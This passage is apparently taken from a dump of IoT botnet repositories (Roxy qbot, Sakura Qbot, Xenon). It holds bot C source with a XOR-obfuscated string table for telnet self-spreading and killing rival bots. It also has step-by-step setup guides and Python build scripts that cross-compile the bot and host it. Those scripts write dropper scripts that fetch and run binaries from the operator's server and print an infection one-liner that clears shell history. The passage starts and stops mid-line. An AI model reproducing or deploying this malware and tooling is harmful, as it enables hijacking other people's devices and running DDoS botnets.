-acc; 122 | 123 | return (acc); 124 | } 125 | 126 | char *util_itoa(int value, int radix, char *string) 127 | { 128 | if(string == NULL) 129 | return NULL; 130 | 131 | if(value != 0) 132 | { 133 | char scratch[34]; 134 | int neg = 0; 135 | int offset = 0; 136 | int c = 0; 137 | unsigned int accum; 138 | 139 | offset = 32; 140 | scratch[33] = 0; 141 | 142 | if(radix == 10 && value < 0) 143 | { 144 | neg = 1; 145 | accum = -value; 146 | } 147 | else 148 | { 149 | neg = 0; 150 | accum = (unsigned int)value; 151 | } 152 | 153 | while(accum) 154 | { 155 | c = accum % radix; 156 | if(c < 10) 157 | c += '0'; 158 | else 159 | c += 'A' - 10; 160 | 161 | scratch[offset] = c; 162 | accum /= radix; 163 | offset--; 164 | } 165 | 166 | if(neg) 167 | scratch[offset] = '-'; 168 | else 169 | offset++; 170 | 171 | util_strcpy(string, &scratch[offset]); 172 | } 173 | else 174 | { 175 | string[0] = '0'; 176 | string[1] = 0; 177 | } 178 | 179 | return string; 180 | } 181 | 182 | int util_memsearch(char *buf, int buf_len, char *mem, int mem_len) 183 | { 184 | int i = 0, matched = 0; 185 | 186 | if(mem_len > buf_len) 187 | return -1; 188 | 189 | for(i = 0; i < buf_len; i++) 190 | { 191 | if(buf[i] == mem[matched]) 192 | { 193 | if(++matched == mem_len) 194 | return i + 1; 195 | } 196 | else 197 | matched = 0; 198 | } 199 | 200 | return -1; 201 | } 202 | 203 | int util_stristr(char *haystack, int haystack_len, char *str) 204 | { 205 | char *ptr = haystack; 206 | int str_len = util_strlen(str); 207 | int match_count = 0; 208 | 209 | while(haystack_len-- > 0) 210 | { 211 | char a = *ptr++; 212 | char b = str[match_count]; 213 | a = a >= 'A' && a <= 'Z' ? a | 0x60 : a; 214 | b = b >= 'A' && b <= 'Z' ? b | 0x60 : b; 215 | 216 | if(a == b) 217 | { 218 | if(++match_count == str_len) 219 | return (ptr - haystack); 220 | } 221 | else 222 | match_count = 0; 223 | } 224 | 225 | return -1; 226 | } 227 | 228 | ipv4_t util_local_addr(void) 229 | { 230 | int fd = 0; 231 | struct sockaddr_in addr; 232 | socklen_t addr_len = sizeof(addr); 233 | 234 | errno = 0; 235 | if((fd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) 236 | { 237 | #ifdef DEBUG 238 | printf("[util] Failed to call socket(), errno = %d\n", errno); 239 | #endif 240 | return 0; 241 | } 242 | 243 | addr.sin_family = AF_INET; 244 | addr.sin_addr.s_addr = INET_ADDR(8,8,8,8); 245 | addr.sin_port = htons(53); 246 | 247 | connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)); 248 | 249 | getsockname(fd, (struct sockaddr *)&addr, &addr_len); 250 | close(fd); 251 | 252 | return addr.sin_addr.s_addr; 253 | } 254 | 255 | char *util_fdgets(char *buffer, int buffer_size, int fd) 256 | { 257 | int got = 0, total = 0; 258 | do 259 | { 260 | got = read(fd, buffer + total, 1); 261 | total = got == 1 ? total + 1 : total; 262 | } 263 | while(got == 1 && total < buffer_size && *(buffer + (total - 1)) != '\n'); 264 | 265 | return total == 0 ? NULL : buffer; 266 | } 267 | 268 | static inline int util_isupper(char c) 269 | { 270 | return (c >= 'A' && c <= 'Z'); 271 | } 272 | 273 | static inline int util_isalpha(char c) 274 | { 275 | return ((c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z')); 276 | } 277 | 278 | static inline int util_isspace(char c) 279 | { 280 | return (c == ' ' || c == '\t' || c == '\n' || c == '\12'); 281 | } 282 | 283 | static inline int util_isdigit(char c) 284 | { 285 | return (c >= '0' && c <= '9'); 286 | } 287 | -------------------------------------------------------------------------------- /Roxy Shitbot/Roxy qbot/bot/xor.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | 3 | #ifdef DEBUG 4 | #include 5 | #endif 6 | #include 7 | #include 8 | 9 | #include "headers/xor.h" 10 | #include "headers/util.h" 11 | 12 | uint32_t table_key = 0xebf9ca2d; 13 | struct table_value table[MAX_XOR_KEYS]; 14 | 15 | void table_init(void) 16 | { 17 | // Scanner Connection Port 18 | add_entry(XOR_SCAN_PORT, "\xB6\xA9", 2); // 17244 19 | 20 | // Encrypted qBot Strings 21 | add_entry(XOR_NULL, "\xDD\x9B\x80\x99\x99\xDC\xF5", 7); // (null) 22 | 23 | // Keep Alive/IOCTL/Watchdogs 24 | add_entry(XOR_IOCTL_WATCH1, "\xDA\x91\x90\x83\xDA\x82\x94\x81\x96\x9D\x91\x9A\x92\xF5", 14); // /dev/watchdog 25 | add_entry(XOR_IOCTL_WATCH2, "\xDA\x91\x90\x83\xDA\x98\x9C\x86\x96\xDA\x82\x94\x81\x96\x9D\x91\x9A\x92\xF5", 19); // /dev/misc/watchdog 26 | add_entry(XOR_IOCTL_WATCH3, "\xDA\x91\x90\x83\xDA\x82\x94\x81\x96\x9D\x91\x9A\x92\xC5\xF5", 15); // /dev/watchdog0 27 | add_entry(XOR_IOCTL_WATCH4, "\xDA\x97\x9C\x9B\xDA\x82\x94\x81\x96\x9D\x91\x9A\x92\xF5", 14); // /bin/watchdog 28 | add_entry(XOR_IOCTL_WATCH5, "\xDA\x90\x81\x96\xDA\x82\x94\x81\x96\x9D\x91\x9A\x92\xF5", 14); // /etc/watchdog 29 | 30 | // Telnet Selfrep 31 | add_entry(XOR_SCAN_SHELL, "\x86\x9D\x90\x99\x99\xF5", 6); // shell 32 | add_entry(XOR_SCAN_ENABLE, "\x90\x9B\x94\x97\x99\x90\xF5", 7); // enable 33 | add_entry(XOR_SCAN_SYSTEM, "\x86\x8C\x86\x81\x90\x98\xF5", 7); // system 34 | add_entry(XOR_SCAN_LINUXSHELL, "\x99\x9C\x9B\x80\x8D\x86\x9D\x90\x99\x99\xF5", 11); // linuxshell 35 | add_entry(XOR_SCAN_BAH, "\x17\x14\x1D\x75", 4); // bah 36 | add_entry(XOR_SCAN_SH, "\x86\x9D\xF5", 3); // sh 37 | 38 | // Checks Login 39 | add_entry(XOR_SCAN_NCORRECT, "\x9B\x96\x9A\x87\x87\x90\x96\x81\xF5", 9); // ncorrect 40 | add_entry(XOR_SCAN_OGIN, "\x9A\x92\x9C\x9B\xF5", 5); // ogin 41 | add_entry(XOR_SCAN_ENTER, "\x90\x9B\x81\x90\x87\xF5", 6); // enter 42 | add_entry(XOR_SCAN_ASSWORD, "\x94\x86\x86\x82\x9A\x87\x91\xF5", 8); // assword 43 | 44 | // Checks To See If Its Logged In 45 | add_entry(XOR_SCAN_QUERY, "\xDA\x97\x9C\x9B\xDA\x97\x80\x86\x8C\x97\x9A\x8D\xD5\xBE\xAC\xA1\xBA\xBB\xF5", 19); // /bin/busybox Switchblades 46 | add_entry(XOR_SCAN_RESP, "\xBE\xAC\xA1\xBA\xBB\xCF\xD5\x94\x85\x85\x99\x90\x81\xD5\x9B\x9A\x81\xD5\x93\x9A\x80\x9B\x91\xF5", 24); // Switchblades: applet not found 47 | 48 | // Botkiller 49 | add_entry(XOR_KILL_PROC, "\xDA\x85\x87\x9A\x96\xDA\xF5", 7); // /proc/ 50 | add_entry(XOR_KILL_EXE, "\xDA\x90\x8D\x90\xF5", 5); // /exe 51 | add_entry(XOR_KILL_FD, "\xDA\x93\x91\xF5", 4); // /fd 52 | add_entry(XOR_KILL_MAPS, "\xDA\x98\x94\x85\x86\xF5", 6); // /maps 53 | add_entry(XOR_KILL_TCP, "\xDA\x85\x87\x9A\x96\xDA\x9B\x90\x81\xDA\x81\x96\x85\xF5", 14); // /proc/net/tcp 54 | 55 | // Strings to Kill 56 | add_entry(XOR_MEM_HTTP, "\xA0\x86\x90\x87\xD8\xB4\x92\x90\x9B\x81\xCF\xF5", 8); // User-Agent: // kills nets with HTTP method 57 | add_entry(XOR_MEM_QBOT1, "\xDA\x91\x90\x83\xDA\x9B\x80\x99\x99\xF5", 10); // /dev/null // kills most qbots 58 | add_entry(XOR_MEM_QBOT2, "\xA6\xA1\xB1\xF5", 4); // STD 59 | add_entry(XOR_MEM_QBOT3, "\xDA\x85\x87\x9A\x96\xDA\x9B\x90\x81\xDA\x87\x9A\x80\x81\x90\xF5", 16); // /etc/rc.conf 60 | add_entry(XOR_MEM_MIRAI, "\xDA\x85\x87\x9A\x96\xDA\x9B\x90\x81\xDA\x81\x96\x85\xF5", 14); // /proc/net/tcp 61 | add_entry(XOR_MEM_SELF_EXE, "\xDA\x85\x87\x9A\x96\xDA\x86\x90\x99\x93\xDA\x90\x8D\x90\xF5", 15); // /proc/self/exe 62 | add_entry(XOR_MEM_UPX, "\xA0\xA5\xAD\xD4\xF5", 5); // UPX! 63 | add_entry(XOR_MEM_ROUTE, "\xDA\x85\x87\x9A\x96\xDA\x9B\x90\x81\xDA\x87\x9A\x80\x81\x90\xF5", 16); // /proc/net/route 64 | add_entry(XOR_MEM_RC, "\xDA\x90\x81\x96\xDA\x87\x96\xDB\x91\xDA\x87\x96\xDB\x99\x9A\x96\x94\x99\xF5", 19); // /etc/rc.d/rc.local 65 | add_entry(XOR_MEM_BINSH, "\xDA\x97\x9C\x9B\xDA\x86\x9D\xF5", 8); // /bin/sh 66 | 67 | // Misc 68 | add_entry(XOR_EXEC_SUCCESS, "\xBC\x9B\x93\x90\x96\x81\x90\x91\xB7\x8C\xB9\x94\x8C\x90\x87\xF5", 8); //rape is not good 69 | add_entry(XOR_RANDOM, "\x84\xB6\xCD\x96\xA3\x80\xB2\xA1\x9B\xA7\xBD\xC3\x96\x93\x83\xC2\x86\x9F\x96\xAC\xA5\xB3\x83\xC2\x92\x80\xB4\x98\xAF\x8D\x97\xA4\xA7\x96\xC0\xC2\x93\xA3\xC2\xC2\xBC\xA0\xA0\x9F\xC0\x97\xC3\x82\x9A\x96\x85\x93\xB3\xBF\xA5\x98\xBD\xB6\xF5", 59); // qC8cVuGTnRH6cfv7sjcYPFv7guAmZxbQRc57fV77IUUj5b6wocpfFJPmHC 70 | 71 | } 72 | 73 | void table_unlock_val(uint8_t id) 74 | { 75 | struct table_value *val = &table[id]; 76 | toggle_obf(id); 77 | } 78 | 79 | void table_lock_val(uint8_t id) 80 | { 81 | struct table_value *val = &table[id]; 82 | toggle_obf(id); 83 | } 84 | 85 | char *table_retrieve_val(int id, int *len) 86 | { 87 | struct table_value *val = &table[id]; 88 | if(len != NULL) 89 | *len = (int)val->val_len; 90 | 91 | return val->val; 92 | } 93 | 94 | static void add_entry(uint8_t id, char *buf, int buf_len) 95 | { 96 | char *cpy = malloc(buf_len); 97 | util_memcpy(cpy, buf, buf_len); 98 | 99 | table[id].val = cpy; 100 | table[id].val_len = (uint16_t)buf_len; 101 | } 102 | 103 | static void toggle_obf(uint8_t id) 104 | { 105 | int i = 0; 106 | struct table_value *val = &table[id]; 107 | uint8_t k1 = table_key & 0xff, 108 | k2 = (table_key >> 8) & 0xff, 109 | k3 = (table_key >> 16) & 0xff, 110 | k4 = (table_key >> 24) & 0xff; 111 | 112 | for(i = 0; i < val->val_len; i++) 113 | { 114 | val->val[i] ^= k1; 115 | val->val[i] ^= k2; 116 | val->val[i] ^= k3; 117 | val->val[i] ^= k4; 118 | } 119 | } 120 | -------------------------------------------------------------------------------- /Roxy Shitbot/Roxy qbot/setup: -------------------------------------------------------------------------------- 1 | [1] Install dependencies. 2 | 3 | if ur server cant connect to landley.net download the compilers from here: wget https://anonfile.com/L8fdG1W9n4/cross-compiler-armv7l.tar_bz2 4 | 5 | 6 | Run All This Down To "cd ~/" 7 | so now just drag the files in 8 | 9 | yum update -y 10 | yum install epel-release -y 11 | yum groupinstall "Development Tools" -y 12 | yum install gmp-devel -y 13 | ln -s /usr/lib64/libgmp.so.3 /usr/lib64/libgmp.so.10 14 | yum install screen wget bzip2 gcc nano gcc-c++ electric-fence sudo git libc6-dev httpd xinetd tftpd tftp-server mysql mysql-server gcc glibc-static -y 15 | yum clean all 16 | 17 | mkdir /etc/xcompile 18 | cd /etc/xcompile 19 | wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2 20 | wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2 21 | wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2 22 | wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2 23 | wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2 24 | wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2 25 | wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2 26 | wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2 27 | wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2 28 | wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2 29 | wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv7l.tar.bz2 30 | 31 | tar -jxf cross-compiler-i586.tar.bz2 32 | tar -jxf cross-compiler-m68k.tar.bz2 33 | tar -jxf cross-compiler-mips.tar.bz2 34 | tar -jxf cross-compiler-mipsel.tar.bz2 35 | tar -jxf cross-compiler-powerpc.tar.bz2 36 | tar -jxf cross-compiler-sh4.tar.bz2 37 | tar -jxf cross-compiler-sparc.tar.bz2 38 | tar -jxf cross-compiler-armv4l.tar.bz2 39 | tar -jxf cross-compiler-armv5l.tar.bz2 40 | tar -jxf cross-compiler-armv6l.tar.bz2 41 | tar -jxf cross-compiler-armv7l.tar.bz2 42 | rm -rf *.tar.bz2 43 | mv cross-compiler-i586 i586 44 | mv cross-compiler-m68k m68k 45 | mv cross-compiler-mips mips 46 | mv cross-compiler-mipsel mipsel 47 | mv cross-compiler-powerpc powerpc 48 | mv cross-compiler-sh4 sh4 49 | mv cross-compiler-sparc sparc 50 | mv cross-compiler-armv4l armv4l 51 | mv cross-compiler-armv5l armv5l 52 | mv cross-compiler-armv6l armv6l 53 | mv cross-compiler-armv7l armv7l 54 | 55 | cd /tmp 56 | wget https://dl.google.com/go/go1.14.1.linux-amd64.tar.gz -q 57 | tar -xzf go1.14.1.linux-amd64.tar.gz 58 | mv go /usr/local 59 | export GOROOT=/usr/local/go 60 | export GOPATH=$HOME/Projects/Proj1 61 | export PATH=$GOPATH/bin:$GOROOT/bin:$PATH 62 | go version 63 | go env 64 | cd ~/ 65 | 66 | [2] Change IPs where needed. 67 | 68 | [3] Restart services. 69 | 70 | iptables -F; service iptables stop 71 | service httpd restart 72 | 73 | [4] Compile. 74 | 75 | cd ~/ 76 | chmod 0777 * -R 77 | sh construct.sh 78 | 79 | [5] Pack with UPX. 80 | 81 | chmod +x upx 82 | ./upx --ultra-brute /var/www/html/SBIDIOT/* 83 | 84 | [6][a] Edit typesizes.h 85 | 86 | nano /usr/include/bits/typesizes.h 87 | Scroll down and replace 1024 with 999999 88 | Save with CTRL+X, Y, ENTER. 89 | 90 | [6][b] Increase ulimit 91 | 92 | ulimit -n 999999; ulimit -u 999999; ulimit -e 999999 93 | 94 | screen and start seldrep 95 | 96 | cd cnc 97 | 98 | screen ./cnc 666 50 775 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | ****************** 107 | how to selfrep 108 | 109 | cd loader 110 | cat *.txt | ./loader 111 | 112 | CTRL-C to stop or CTRL-Z 113 | -------------------------------------------------------------------------------- /Sakura_Qbot/Sakura_Build.py: -------------------------------------------------------------------------------- 1 | import subprocess, sys 2 | #Made By Zinqo. 3 | if len(sys.argv[2]) != 0: 4 | ip = sys.argv[2] 5 | else: 6 | print("\x1b[1;95mIncorrect Usage!\x1b[0m") 7 | exit(1) 8 | 9 | bot = sys.argv[1] 10 | Sakura= raw_input("\x1b[1;95mReady To Install Cross Compilers? (Press Enter): \x1b[0m") 11 | if Sakura.lower() == "": 12 | get_arch = True 13 | else: 14 | get_arch = False 15 | #Made By Zinqo. 16 | compileas = ["m-i.p-s.Sakura" , 17 | "m-p.s-l.Sakura" , 18 | "s-h.4-.Sakura", 19 | "x-8.6-.Sakura", 20 | "a-r.m-6.Sakura", 21 | "x-3.2-.Sakura", 22 | "a-r.m-7.Sakura", 23 | "p-p.c-.Sakura", 24 | "i-5.8-6.Sakura", 25 | "m-6.8-k.Sakura", 26 | "p-p.c-.Sakura", 27 | "a-r.m-4.Sakura" , 28 | "a-r.m-5.Sakura"] 29 | 30 | getarch = ['http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2', 31 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2', 32 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2', 33 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2', 34 | 'http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2', 35 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2', 36 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2', 37 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2', 38 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2', 39 | 'https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv7l.tar.bz2', 40 | 'https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2', 41 | 'https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2'] 42 | 43 | ccs = ["cross-compiler-mips", 44 | "cross-compiler-mipsel", 45 | "cross-compiler-sh4", 46 | "cross-compiler-x86_64", 47 | "cross-compiler-armv6l", 48 | "cross-compiler-i686", 49 | "cross-compiler-powerpc", 50 | "cross-compiler-i586", 51 | "cross-compiler-m68k", 52 | "cross-compiler-armv7l", 53 | "cross-compiler-armv4l", 54 | "cross-compiler-armv4l", 55 | "cross-compiler-armv5l"] 56 | #Made By Zinqo. 57 | def run(cmd): 58 | subprocess.call(cmd, shell=True) 59 | 60 | run("rm -rf /var/www/html/* /var/lib/tftpboot/* /var/ftp/*") 61 | 62 | if get_arch == True: 63 | run("rm -rf cross-compiler-*") 64 | 65 | for arch in getarch: 66 | run("wget " + arch + " --no-check-certificate >> /dev/null") 67 | run("tar -xvf *tar.bz2") 68 | run("rm -rf *tar.bz2") 69 | #Made By Zinqo. 70 | num = 0 71 | for cc in ccs: 72 | arch = cc.split("-")[2] 73 | run("./"+cc+"/bin/"+arch+"-gcc -static -pthread -D" + arch.upper() + " -o " + compileas[num] + " " + bot + " > /dev/null") 74 | num += 1 75 | 76 | run("yum install httpd -y") 77 | run("service httpd start") 78 | run("yum install xinetd tftp tftp-server -y") 79 | run("yum install vsftpd -y") 80 | run("service vsftpd start") 81 | #Made By Zinqo. 82 | run('''echo -e "# default: off 83 | #Made By Zinqo. 84 | service tftp 85 | { 86 | socket_type = dgram 87 | protocol = udp 88 | wait = yes 89 | user = root 90 | server = /usr/sbin/in.tftpd 91 | server_args = -s -c /var/lib/tftpboot 92 | disable = no 93 | per_source = 11 94 | cps = 100 2 95 | flags = IPv4 96 | } 97 | " > /etc/xinetd.d/tftp''') 98 | run("service xinetd start") 99 | #Made By Zinqo. 100 | run('''echo -e "listen=YES 101 | local_enable=NO 102 | anonymous_enable=YES 103 | write_enable=NO 104 | anon_root=/var/ftp 105 | anon_max_rate=2048000 106 | xferlog_enable=YES 107 | listen_address='''+ ip +''' 108 | listen_port=21" > /etc/vsftpd/vsftpd-anon.conf''') 109 | run("service vsftpd restart") 110 | for i in compileas: 111 | run("cp " + i + " /var/www/html") 112 | run("cp " + i + " /var/ftp") 113 | run("mv " + i + " /var/lib/tftpboot") 114 | 115 | run('echo -e "#!/bin/bash" > /var/lib/tftpboot/tftp1.sh') 116 | 117 | run('echo -e "ulimit -n 1024" >> /var/lib/tftpboot/tftp1.sh') 118 | 119 | run('echo -e "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/tftp1.sh') 120 | #Made By Zinqo. 121 | run('echo -e "#!/bin/bash" > /var/lib/tftpboot/tftp2.sh') 122 | 123 | run('echo -e "ulimit -n 1024" >> /var/lib/tftpboot/tftp2.sh') 124 | 125 | run('echo -e "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/tftp2.sh') 126 | 127 | run('echo -e "#!/bin/bash" > /var/www/html/Sakura.sh') 128 | 129 | for i in compileas: 130 | run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://' + ip + '/' + i + '; chmod +x ' + i + '; ./' + i + '; rm -rf ' + i + '" >> /var/www/html/Sakura.sh') 131 | run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; ftpget -v -u anonymous -p anonymous -P 21 ' + ip + ' ' + i + ' ' + i + '; chmod 777 ' + i + ' ./' + i + '; rm -rf ' + i + '" >> /var/ftp/ftp1.sh') 132 | run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp ' + ip + ' -c get ' + i + ';cat ' + i + ' >badbox;chmod +x *;./badbox" >> /var/lib/tftpboot/tftp1.sh') 133 | run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r ' + i + ' -g ' + ip + ';cat ' + i + ' >badbox;chmod +x *;./badbox" >> /var/lib/tftpboot/tftp2.sh') 134 | run("service xinetd restart") 135 | run("service httpd restart") 136 | run('echo -e "ulimit -n 99999" >> ~/.bashrc') 137 | #Made By Zinqo. 138 | print("\x1b[1;95mPayload: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://" + ip + "/Sakura.sh; chmod 777 *; sh Sakura.sh; tftp -g " + ip + " -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c\x1b[0m") 139 | -------------------------------------------------------------------------------- /Sakura_Qbot/Sakura_Login.txt: -------------------------------------------------------------------------------- 1 | 100down 100down -------------------------------------------------------------------------------- /Sakura_Qbot/tut.txt: -------------------------------------------------------------------------------- 1 | Edit the Sakura_Bot.c file and find where it says "SERVERIP" and change it to your server IP. 2 | 3 | Edit the Sakura_Login.txt file and replace where it says "USERNAME PASSWORD" to your user and pass. 4 | 5 | Edit where it says "[SERVERIP]" below to your server IP. *Make sure you also replace the brackets. 6 | 7 | Drag all files into your server and run these commands... 8 | -------------------------------------------------------------------- 9 | yum install python-paramiko nano screen gcc perl wget lbzip unzip -y 10 | 11 | service httpd restart; service iptables stop 12 | 13 | gcc Sakura_CNC.c -o Sakura -pthread 14 | 15 | python Sakura_Build.py Sakura_Bot.c [SERVERIP] 16 | 17 | screen ./Sakura 12345 1 54321 18 | -------------------------------------------------------------------- 19 | Now press ctrl-A+D *If screen doesnt work then type "pkill screen" then try to screen again. 20 | 21 | Copy your payload and save it somewhere safe so you can root servers and scan bots in the future. 22 | 23 | Bot port is 12345, CNC port is 54321 and the connection type is RAW. 24 | 25 | Type "screen -x" to see Sakura activity. 26 | 27 | Make sure to check the Sakura_Logs.log file that will appear in your server to see all user logs. 28 | -------------------------------------------------------------------------------- /Xenon/Setup.txt: -------------------------------------------------------------------------------- 1 | put Server IP in main.c and cnc.c 2 | 3 | yum install gcc screen nano httpd python perl -y; ulimit -n 999999 4 | 5 | iptables -F; service iptables stop 6 | 7 | gcc cnc.c -o Xenon -pthread 8 | 9 | nano login.txt put User PASS admin access maxtime max bots 10 | 11 | python Xenon.py fff 134.122.111.155 Xenon bins 12 | 13 | screen ./Xenon 1111 1 420 14 | 15 | mv iplookup.php /var/www/html/; yum install php -y; service httpd restart -------------------------------------------------------------------------------- /Xenon/Xenon.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import time 3 | import subprocess 4 | 5 | if len(sys.argv) < 4: 6 | print("\x1b[31mIncorrect Usage! python Xenon.py fff [IP] [SHPREFIX] [DIRNAME]\x1b[0m") 7 | sys.exit() 8 | 9 | bot = "main.c" 10 | ip = sys.argv[2] 11 | prefix = sys.argv[3] 12 | dirname = sys.argv[4] 13 | 14 | print "\t\x1b[1;33m[\x1b[1;34mXenon\x1b[1;33m]" 15 | arch_question = raw_input("\x1b[1;33mDownload Cross Compilers? y/n:\x1b[0m") 16 | if arch_question.lower() == "y": 17 | get_arch = True 18 | else: 19 | get_arch = False 20 | 21 | time.sleep(5) 22 | 23 | compileas = ["mips", #mips 24 | "mpsl", #mipsel 25 | "sh4", #sh4 26 | "x86", #x86 27 | "arm6", #Armv6l 28 | "i686", #i686 29 | "powerpc", #ppc 30 | "i586", #i586 31 | "m68k", #m68k 32 | "spc", #sparc 33 | "arm4", #' ' 34 | "arm5", 35 | "arm7"] 36 | 37 | getarch = ['http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2', 38 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2', 39 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2', 40 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2', 41 | 'http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2', 42 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2', 43 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2', 44 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2', 45 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2', 46 | 'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2', 47 | 'https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2', 48 | 'https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2', 49 | 'wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv7l.tar.bz2'] 50 | ccs = ["cross-compiler-mips", 51 | "cross-compiler-mipsel", 52 | "cross-compiler-sh4", 53 | "cross-compiler-x86_64", 54 | "cross-compiler-armv6l", 55 | "cross-compiler-i686", 56 | "cross-compiler-powerpc", 57 | "cross-compiler-i586", 58 | "cross-compiler-m68k", 59 | "cross-compiler-sparc", 60 | "cross-compiler-armv4l", 61 | "cross-compiler-armv5l", 62 | "cross-compiler-armv7l"] 63 | 64 | 65 | def run(cmd): 66 | subprocess.call(cmd, shell=True) 67 | 68 | run("rm -rf /root/"+dirname+"/; rm -rf /var/www/html/"+dirname+"/; rm -rf /var/ftp/"+dirname+"/; rm -rf /var/lib/tftpboot/"+dirname+"/") 69 | run("mkdir /root/"+dirname+"/; mkdir /var/www/html/"+dirname+"/; mkdir /var/ftp/"+dirname+"/; mkdir /var/lib/tftpboot/"+dirname+"/") 70 | 71 | if get_arch == True: 72 | run("rm -rf cross-compiler-*") 73 | print("\x1b[1;36mDownloading Architectures...\x1b[0m") 74 | 75 | for arch in getarch: 76 | run("wget " + arch + " --no-check-certificate >> /dev/null") 77 | run("tar -xvf *tar.*") 78 | run("rm -rf *tar.*") 79 | 80 | print("\x1b[1;32mDownloaded Cross Compilers...\x1b[0m") 81 | 82 | num = 0 83 | for cc in ccs: 84 | arch = cc.split("-")[2] 85 | run("./"+cc+"/bin/"+arch+"-gcc -static -pthread -D" + arch.upper() + "_BUILD -o " + compileas[num] + " " + bot + " > /dev/null") 86 | run("./"+cc+"/bin/"+arch+"-strip -s " + arch.upper() + " > /dev/null") 87 | #ok = "./"+cc+"/bin/"+arch+"-gcc -static -pthread -D" + arch.upper() + "_BUILD -o " + compileas[num] + " " + bot + " > /dev/null" 88 | #run("echo '"+ok+"' >> lol.txt") 89 | num += 1 90 | 91 | print("\x1b[1;33mSetting up HTTPD and TFTP...\x1b[0m") 92 | time.sleep(5) 93 | 94 | run("yum install httpd -y") 95 | run("service httpd start") 96 | run("yum install xinetd tftp tftp-server -y") 97 | run("yum install vsftpd -y") 98 | run("service vsftpd start") 99 | 100 | run('''echo -e "# default: off 101 | # description: The tftp server serves files using the trivial file transfer \ 102 | # protocol. The tftp protocol is often used to boot diskless \ 103 | # workstations, download configuration files to network-aware printers, \ 104 | # and to start the installation process for some operating systems. 105 | service tftp 106 | { 107 | socket_type = dgram 108 | protocol = udp 109 | wait = yes 110 | user = root 111 | server = /usr/sbin/in.tftpd 112 | server_args = -s -c /var/lib/tftpboot 113 | disable = no 114 | per_source = 11 115 | cps = 100 2 116 | flags = IPv4 117 | } 118 | " > /etc/xinetd.d/tftp''') 119 | 120 | run("service xinetd start") 121 | time.sleep(5) 122 | 123 | run('''echo -e "listen=YES 124 | local_enable=NO 125 | anonymous_enable=YES 126 | write_enable=NO 127 | anon_root=/var/ftp 128 | anon_max_rate=2048000 129 | xferlog_enable=YES 130 | listen_address='''+ ip +''' 131 | listen_port=21" > /etc/vsftpd/vsftpd-anon.conf''') 132 | 133 | run("service vsftpd restart") 134 | time.sleep(5) 135 | 136 | for i in compileas: 137 | run("cp " + i + " /var/www/html/"+dirname+"") 138 | run("cp " + i + " /var/ftp/"+dirname+"") 139 | run("mv " + i + " /var/lib/tftpboot/"+dirname+"") 140 | run('echo -e "#!/bin/bash" > /var/lib/tftpboot/'+dirname+'/'+prefix+'tftp1.sh') 141 | run('echo -e "ulimit -n 1024" >> /var/lib/tftpboot/'+dirname+'/'+prefix+'tftp1.sh') 142 | run('echo -e "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/'+dirname+'/'+prefix+'tftp1.sh') 143 | run('echo -e "#!/bin/bash" > 